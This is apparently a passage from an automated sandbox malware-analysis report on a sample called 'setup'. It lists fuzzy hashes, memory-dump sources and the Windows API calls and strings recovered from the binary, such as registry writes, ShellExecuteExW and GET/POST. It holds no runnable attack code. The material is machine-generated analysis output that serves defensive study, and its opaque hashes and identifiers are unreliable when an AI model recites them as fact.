• Opcode Fuzzy Hash: 522ba4f7fe997f7fa9e752b97ed5e7d2d2ce0fee65f1ab03aa3de4b018083fb2
• Instruction Fuzzy Hash: 3631E331640255AFDF05EBA0D856BEE3764AF20310F14C129FD156B2C2DF749B48E720
APIs
  • Part of subcall function 00C3AF66: RegCloseKey.ADVAPI32(00000000,?,?,?,?,00C3AD94,?,00000000), ref: 00C3AFAB
• RegSetValueExW.ADVAPI32(00000000,?,00000000,00000003,?,?,?,00000000), ref: 00C3B035
• RegCloseKey.ADVAPI32(00000000), ref: 00C3B03E
Strings
Similarity
• API ID: Close$Value
• String ID: A
• API String ID: 299128501-3554254475
• Opcode ID: ccd73cbcdd8e43fca15138637cd20ad3225263b03622ccf9e2b9c8824662e624
• Instruction ID: dda27661e2917c6e86c2817e58ebeafb539e16329d55ca3aeef44fcbd9569160
• Opcode Fuzzy Hash: ccd73cbcdd8e43fca15138637cd20ad3225263b03622ccf9e2b9c8824662e624
• Instruction Fuzzy Hash: 5A212876510124ABCB159F94DC45AAFBFB5EF48760F10405AF914DB291EB32CD42D760
APIs
Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: H_prolog3
                                                                                                                          • String ID: .lnk$.pif
                                                                                                                          • API String ID: 431132790-2725715280
                                                                                                                          • Opcode ID: 9b1b9555109df6b7e98f5a681c938d5aefd67288cba3e89d5c4d2d32d08e00c3
                                                                                                                          • Instruction ID: ec8fac6fd71b86cef7214b9ecb30dc937e82f36966845b0ad37aa6cb21409f7e
                                                                                                                          • Opcode Fuzzy Hash: 9b1b9555109df6b7e98f5a681c938d5aefd67288cba3e89d5c4d2d32d08e00c3
                                                                                                                          • Instruction Fuzzy Hash: 0021D73250415AAEDF04FBE0D856BEE7B64AF14310F10841AF954A75C2DF349708D761
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: _strncpy
                                                                                                                          • String ID: text
                                                                                                                          • API String ID: 2961919466-999008199
                                                                                                                          • Opcode ID: 397f50370021d8e68e263c25229025a87ad94253a69efa8f54c10972a09703a3
                                                                                                                          • Instruction ID: 3895bee19cd423bd8dc2e62b92946a76b96c31544131e0329510ef03f54df2e1
                                                                                                                          • Opcode Fuzzy Hash: 397f50370021d8e68e263c25229025a87ad94253a69efa8f54c10972a09703a3
                                                                                                                          • Instruction Fuzzy Hash: E31100709002259FCB31EB68DD41F9AB3F8EB14319F0080A9E549A7152D770EE88EF60
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: _strlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4218353326-3688684798
                                                                                                                          • Opcode ID: ac0dbb615841b9af5502e3ec30d9382c7d34c425101ed30b3f8b6b89350a0117
                                                                                                                          • Instruction ID: c5d2a819e844cf29acf945161c91895adc24e6d2a3604ae272d7593e79207699
                                                                                                                          • Opcode Fuzzy Hash: ac0dbb615841b9af5502e3ec30d9382c7d34c425101ed30b3f8b6b89350a0117
                                                                                                                          • Instruction Fuzzy Hash: F301C070B146009BE538DA389C5587B7399EB857107100B1DF4A6873C1DE31DD8DB7E1
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: H_prolog3_
                                                                                                                          • String ID: GET$POST
                                                                                                                          • API String ID: 2427045233-3192705859
                                                                                                                          • Opcode ID: 7a1b4a7175e69128c89a299b0fb0d0eb9ff5a36332b618c9ecdabf17fc4b55c2
                                                                                                                          • Instruction ID: c632623b7df439e282119381baa83ae26da7734bbbd4fa51852bae377ace4aa5
                                                                                                                          • Opcode Fuzzy Hash: 7a1b4a7175e69128c89a299b0fb0d0eb9ff5a36332b618c9ecdabf17fc4b55c2
                                                                                                                          • Instruction Fuzzy Hash: 38115E70901254EBDF14EF90C4955FDB7B4BF15314F59825AEC112B1C1CB306B49EB50
                                                                                                                          APIs
                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 00C15222
                                                                                                                          • wsprintfW.USER32 ref: 00C1525F
                                                                                                                            • Part of subcall function 00C270EE: __EH_prolog3_GS.LIBCMT ref: 00C270F5
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: H_prolog3_Versionwsprintf
                                                                                                                          • String ID: %u.%u.%u
                                                                                                                          • API String ID: 2083962527-4174243573
                                                                                                                          • Opcode ID: 79bf1f5826c90c6a7472283c02d2cf4161c961b661e8a51fb2a85f55b0c7b2aa
                                                                                                                          • Instruction ID: 17ce2a92a336510d5173f8d1103b9d478a56ddbc3f50dd446780d223505ea872
                                                                                                                          • Opcode Fuzzy Hash: 79bf1f5826c90c6a7472283c02d2cf4161c961b661e8a51fb2a85f55b0c7b2aa
                                                                                                                          • Instruction Fuzzy Hash: CD018875A0021CABDF30DBA5DC89FEE73BCAF55300F0001A9A505D2191E7709A44DB50
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: _strlen_strncpy
                                                                                                                          • String ID: VERSION
                                                                                                                          • API String ID: 100186321-2153328089
                                                                                                                          • Opcode ID: b7ff2a53b628c005efb35fefa24df66a66f9b6385274582386b418fc210dbebb
                                                                                                                          • Instruction ID: 61ef23a982f24b8e33daf9471efbb67b0560c31f4def6bb23758ae07107bfb9e
                                                                                                                          • Opcode Fuzzy Hash: b7ff2a53b628c005efb35fefa24df66a66f9b6385274582386b418fc210dbebb
                                                                                                                          • Instruction Fuzzy Hash: F0F0F632B00A1239E7317974BC42FEB378C8B16750F144429FD58D4442E760DB92B3A4
                                                                                                                          APIs
                                                                                                                          • GetClassInfoW.USER32(?,MultiDataViewCtrl,?), ref: 00C0FEED
                                                                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00C0FF20
                                                                                                                            • Part of subcall function 00C2F210: __EH_prolog3_catch.LIBCMT ref: 00C2F217
                                                                                                                            • Part of subcall function 00C2F210: GetClassInfoW.USER32(?,?,0000000B), ref: 00C2F229
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: ClassInfo$CursorH_prolog3_catchLoad
                                                                                                                          • String ID: MultiDataViewCtrl
                                                                                                                          • API String ID: 1472851987-1429961936
                                                                                                                          • Opcode ID: bf0895b24573921f86288646367e63871636912152065bb289b5dd876dcc21ee
                                                                                                                          • Instruction ID: 12a4863b755b2e90562be498fb946fd7c248de124a90aadd3ae330bbe6eb3c11
                                                                                                                          • Opcode Fuzzy Hash: bf0895b24573921f86288646367e63871636912152065bb289b5dd876dcc21ee
                                                                                                                          • Instruction Fuzzy Hash: 4A0171B1C00219DFCB00DFEAD885AEEBBFCAF59304F00006AE500B7251D7759A429BA5
                                                                                                                          APIs
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00C19810
                                                                                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00C19875
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: ExecuteFileModuleNameShell
                                                                                                                          • String ID: <
                                                                                                                          APIs
                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00C3992C
                                                                                                                          • PathFindExtensionW.SHLWAPI(?), ref: 00C39942
                                                                                                                            • Part of subcall function 00C393EE: __EH_prolog3_GS.LIBCMT ref: 00C393F8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: ExtensionFileFindH_prolog3_ModuleNamePath
                                                                                                                          • String ID: %Ts%Ts.dll
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C27297
                                                                                                                            • Part of subcall function 00C038F1: _Deallocate.LIBCONCRT ref: 00C03906
                                                                                                                          • PostMessageW.USER32(?,?,?,?), ref: 00C27302
                                                                                                                          Strings
                                                                                                                          • Call "%s" , Failed with error code : %d, xrefs: 00C272CA
                                                                                                                          Similarity
                                                                                                                          • API ID: DeallocateH_prolog3_MessagePost
                                                                                                                          • String ID: Call "%s" , Failed with error code : %d
                                                                                                                          APIs
                                                                                                                          • SetLastError.KERNEL32(0000007E), ref: 00C02761
                                                                                                                          • GetLastError.KERNEL32 ref: 00C02776
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(?,00000000,?,00000000,00C28512,?,?,?,?,?,00000000), ref: 00C26862
                                                                                                                          • lstrlenW.KERNEL32(?,?,?), ref: 00C26881
                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00C268A9
                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000), ref: 00C268B9
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen
                                                                                                                          APIs
                                                                                                                          • EnterCriticalSection.KERNEL32(00CC39E0,00CC39C4,00000000,00CC39E0), ref: 00C3E2FD
                                                                                                                          • LeaveCriticalSection.KERNEL32(00CC39E0,?), ref: 00C3E313
                                                                                                                          • LocalFree.KERNEL32(00000000), ref: 00C3E31B
                                                                                                                          • TlsSetValue.KERNEL32(?,00000000), ref: 00C3E33A
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                          APIs
                                                                                                                          • EnterCriticalSection.KERNEL32(00CC39E0,?,?,00000000,?,00C3E519,00000000,00000004,00C34F41,00C2DD73,00C2DF03,00C083FC,00000000,?,?,00C0842C), ref: 00C3E529
                                                                                                                          • TlsGetValue.KERNEL32(00CC39C4,?,?,00000000,?,00C3E519,00000000,00000004,00C34F41,00C2DD73,00C2DF03,00C083FC,00000000,?,?,00C0842C), ref: 00C3E53D
                                                                                                                          • LeaveCriticalSection.KERNEL32(00CC39E0,?,?,00000000,?,00C3E519,00000000,00000004,00C34F41,00C2DD73,00C2DF03,00C083FC,00000000,?,?,00C0842C), ref: 00C3E557
                                                                                                                          • LeaveCriticalSection.KERNEL32(00CC39E0,?,?,00000000,?,00C3E519,00000000,00000004,00C34F41,00C2DD73,00C2DF03,00C083FC,00000000,?,?,00C0842C), ref: 00C3E562
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$Leave$EnterValue